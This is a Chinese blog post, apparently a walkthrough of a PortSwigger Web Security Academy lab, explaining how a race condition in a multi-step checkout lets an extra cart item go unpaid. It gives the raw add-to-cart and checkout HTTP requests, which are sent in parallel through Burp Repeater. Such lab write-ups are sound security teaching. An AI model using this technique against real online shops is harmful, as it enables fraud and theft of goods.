5种Race Conditions条件竞争漏洞,你的网站中了哪一个? [3.饶过多步骤流程]

最新推荐文章于 2024-07-19 16:27:02 发布
最新推荐文章于 2024-07-19 16:27:02 发布
阅读量629 收藏 4
点赞数 24
文章标签: 安全 web安全 安全威胁分析 系统安全 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/raymond0820/article/details/137615419
版权

Race conditions(条件竞速)为常见的漏洞,与业务逻辑缺陷有密切关系。当网站在没有足够保护措施的情况下同时处理请求时,就会发生这种情况。这可能会导致多个不同的执行绪同时互相影响而导致冲突,使应用程式中出现意外行为。

常见的攻击方法如下

  1.  饶过只限一次的申请
  2. 饶过爆力破解密码限制
  3. 饶过多步骤流程
  4. 单点请求
  5. 饶过基于时间的机制 

3.饶过多步骤流程

同時向多個端點發送請求,很適合用在有多個步驟的流程,以購物車的例子來說,最常見的就是利用付款驗證後到訂單最終確認時的這段期間,偷塞更多商品

舉例如下,將商品放入購物車的請求如下

########### request ########### 
POST /cart HTTP/2
Host: 0af6000f042c82838020b825003a00b7.web-security-academy.net
Cookie: session=luorI2dsMrYk3uq1ZKqpnueYkyCrw4tF
...omit...
productId=2&redir=PRODUCT&quantity=1

########### response ########### 
HTTP/2 302 Found
Location: /product?productId=2
X-Frame-Options: SAMEORIGIN
Content-Length: 0

結帳的請求如下

########### request ########### 
POST /cart/checkout HTTP/2
Host: 0af6000f042c82838020b825003a00b7.web-security-academy.net
Cookie: session=luorI2dsMrYk3uq1ZKqpnueYkyCrw4tF
...omit...
csrf=2yFzJdest9UUhYC1EmKKckznUuD0Cf4V

########### response ########### 
...omit...
Your order is on its way!
...omit...

購物車請求和結帳請求之間存在漏洞,因此有機會在結帳完成前,在購物車額外增加一個新商品,由於在進行結帳時來不及把新商品的金額算進去,因此即便多了一個商品,價格還是和之前一樣

為了使用這個漏洞,必須將以下放入購物車和結帳請求在同一個時間送出,可以用repeater group send in parallel功能

POST /cart HTTP/2
Host: 0af6000f042c82838020b825003a00b7.web-security-academy.net
Cookie: session=luorI2dsMrYk3uq1ZKqpnueYkyCrw4tF
...omit...
productId=1&redir=PRODUCT&quantity=1
POST /cart/checkout HTTP/2
Host: 0af6000f042c82838020b825003a00b7.web-security-academy.net
Cookie: session=luorI2dsMrYk3uq1ZKqpnueYkyCrw4tF
...omit...
csrf=2yFzJdest9UUhYC1EmKKckznUuD0Cf4V

由於請求扺達時間差的關係,同時送不一定會成功,可能要多試幾次,一旦成功就可以偷渡新商品

  其他方法可参考 Race conditions | 牛的大腦

牛的大腦-網站安全
关注
  • 24
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2024-2193 GHOSTRACE:Exploiting and Mitigating Speculative Race Conditions(推测竞争条件的利用和缓解)ARM安全
security²-卢鸿波-安全二次方
03-25 985
2024年3月,一个研究小组发表了一篇名为《GhostRace: Exploiting and Mitigating Speculative Race Conditions》的论文。该论文演示了一 Spectre v1 变体,利用内核的“推测使用后释放(speculative use-after-free)漏洞”来推测性地劫持控制流,并泄露内核内存。这个变体已被分配了CVE-2024-2193编号。
5Race Conditions条件竞争漏洞,你的网站了哪一个?[1.饶过只限一次的申请]
raymond0820的博客
04-05 236
此为常见的漏洞,与业务逻辑缺陷有密切关系。当网站在没有足够保护措施的情况下同时处理请求时,就会发生这情况。这可能会导致多个不同的执行绪同时互相影响而导致冲突,使应用程式出现意外行为。
5Race Conditions条件竞争漏洞,你的网站了哪一个? [2.饶过爆力破解密码限制]
raymond0820的博客
04-08 350
条件竞争为常见的漏洞,与业务逻辑缺陷有密切关系。当网站在没有足够保护措施的情况下同时处理请求时,就会发生这情况。这可能会导致多个不同的执行绪同时互相影响而导致冲突,使应用程式出现意外行为。
5Race Conditions条件竞争漏洞,你的网站了哪一个? [4.单点请求]
raymond0820的博客
04-14 610
Race conditions(条件竞速)为常见的漏洞,与业务逻辑缺陷有密切关系。当网站在没有足够保护措施的情况下同时处理请求时,就会发生这情况。这可能会导致多个不同的执行绪同时互相影响而导致冲突,使应用程式出现意外行为。
node-js-race-conditions:一系列示例说明了Node.js竞争条件和潜在的解决方案
05-26
node-js-race-conditions 一系列示例说明了Node.js竞争条件和潜在的解决方案。 在文件夹查看代码。 :探索一个简单的竞赛条件。 :使用async/await提供一个简单的解决方案。 :提供使用互斥锁的解决方案(使用...
race-the-web测试Web应用程序竞争条件。 包括一个RESTful API,可集成到持续集成管道
02-06
网上竞赛(RTW) 用于通过同时发送出请求的一个用户指定的号码到目标URL(或URL),然后在Web应用程序竞争条件测试比较从服务器的唯一性的响应。 包括许多配置选项。更新:现在CI兼容! 通过使用易于使用的HTTP API...
snat-race-conn-test:一小段代码,用于触发Linux的SNAT竞争条件
04-29
短跑比赛测试 nf_conntrack代码用于触发SNAT竞争条件,并因此导致nf_conntrack插入失败。 建造 $ dep ensure $ go build
Race Condition漏洞
08-01
竞争条件漏洞是一在多线程或并发环境常见的软件安全问题,它发生在多个线程或进程同时访问共享资源时,由于执行顺序的不确定性导致了不可预测的行为。这问题可能导致数据丢失、数据不一致、程序崩溃甚至恶意...
Race Through!OpenGL的第一个实验——一个简单的赛车游戏-开源.zip
06-19
OpenGL是计算机图形学一个重要库,它允许程序员创建复杂的3D图形和动画。"Race Through!" 是一个基于OpenGL的开源项目,旨在为初学者提供一个实践的起点,通过构建一个简单的赛车游戏来学习和理解OpenGL的基本...
粉尘传感器助力面粉厂安全生产
iotsensor的博客
07-19 280
OPC-R2有16个大小的垃圾箱,可以每秒记录PM1、PM2.5和PM10以及大小直方图,这在应用程序需要的不仅仅是PM时至关重要。OPC-R2取代了OPC-R1,带来了比其前身更好的小颗粒检测、更低的风扇噪声和更好的EMC保护。因此,如何有效监测和控制面粉厂的粉尘浓度,成为了保障安全生产的关键。这传感器能够实时、准确地监测空气的粉尘浓度,并将数据反馈给控制系统,从而实现对粉尘浓度的有效控制。通过实时监测和控制粉尘浓度,可以有效保障工作人员的健康、设备的安全运行以及环境的保护。
捷配总结的SMT工厂安全防静电规则
tyymm的博客
07-17 599
SMT工厂须熟记的安全防静电规则! 安全对于我们非常重要,特别是我们这SMT加工厂,通常我们所讲的安全是指人身安全。 但这里我们须树立一个较为全面的安全常识就是在强调人身安全的同时亦必须注意设备、产品的安全。 电气: 怎样预防人身触电事故? 1、发现有损坏的开关,电线等电气安全隐患,赶快向有关人员报告处理。2、不懂电气技术的人对电气设备不要乱装、乱拆。3、不要用湿手、湿脚动用电气设备(如: 按开关、按钮)。4、清扫卫生时,不要用湿抹布擦电线、开关按钮,一定要搞卫生,请先断开电
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 517
在“某省烟草数据安全体系建设规划”项目实践,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
最新发布
亚信安全官方账号的博客
07-19 206
一站式云安全托管限时试用 开启全能高效攻防
python安全脚本开发简单思路
zhugedali_的博客
07-15 542
定制化报警策略:根据不同的安全事件类型和严重程度,制定个性化的报警策略,包括报警方式(邮件、短信、即时通讯、声光报警等)、接收人员(技术团队、管理层、相关业务部门)、报警内容(事件详情、影响评估、建议措施)。- 详细的错误日志记录:当捕获到异常时,记录详细的错误信息,包括错误类型、错误消息、发生时间、相关的上下文信息(如函数参数、变量值),以便后续的故障排查和分析。- 多层级的异常捕获:在不同的代码层次(函数级别、模块级别、主程序级别)设置异常捕获机制,确保能够捕获和处理各类型的异常。
浅谈安数云智能安全运营管理平台:DCS-SOAR
2401_82472120的博客
07-15 867
安数云DCS-SOAR平台致力于解决用户云上资产的安全运营问题,面对用户防护设备繁杂臃肿、安全事件难以及时响应、运营成本逐年上升的困境,安数云DCS-SOAR平台以安全大脑驱动为核心,建立运营体系,通过OneStep框架实现第三方安全产品的“无门槛接入、低门槛纳管”;威胁和告警数量不断增长,资源又不足以应对所有问题,在日常运营分析人员需要快速决定哪些告警需要处理,哪些可以忽略,但由于超负荷工作,很可能错过真正的威胁,在应对威胁和恶意攻击时出现误判,最终使网络及数据产生安全泄露,造成无可挽回的损失。
Vue的安全性:防范XSS攻击与安全最佳实践
哎 你看的博客
07-19 402
随着Web应用的普及,前端安全问题日益受到重视。Vue作为当下流行的前端框架,其安全性也成为开发者关注的焦点。跨站脚本攻击(XSS)是常见的Web安全漏洞之一,本文将讨论如何在使用Vue时防范XSS攻击,并分享其他Vue安全最佳实践。
邮件安全篇:邮件端到端加密S/MIME
sdexcel的专栏
07-19 455
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
[Linux安全运维] OpenVPN部署
Da1NtY的博客
07-19 579
同样的,在创建服务端证书的时候也需要输入一个Common Name用户名,注意与根证书用户名不一样。下载网址: https://github.com/OpenVPN/easy-rsa。2.6.1 将服务端所需的必要文件放到/etc/openvpn/。2.6.2 将客户端所需的必要文件放到/root/client/。创建/etc/openvpn/目录,将easy-rsa放进去。签约证书需要输入根证书的密码,与签约服务端证书时的过程一样。在日志文件/var/log/创建一个openvpn/
介绍一下 promise?Promise.all和Promise.race的区别的使用场景?
12-20
2. Promise.race:接收一个Promise对象的可迭代参数,返回一个新的Promise对象。当其一个Promise对象变为fulfilled或rejected状态时,新的Promise对象会立即变为相同的状态,并返回第一个完成的Promise对象的结果...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值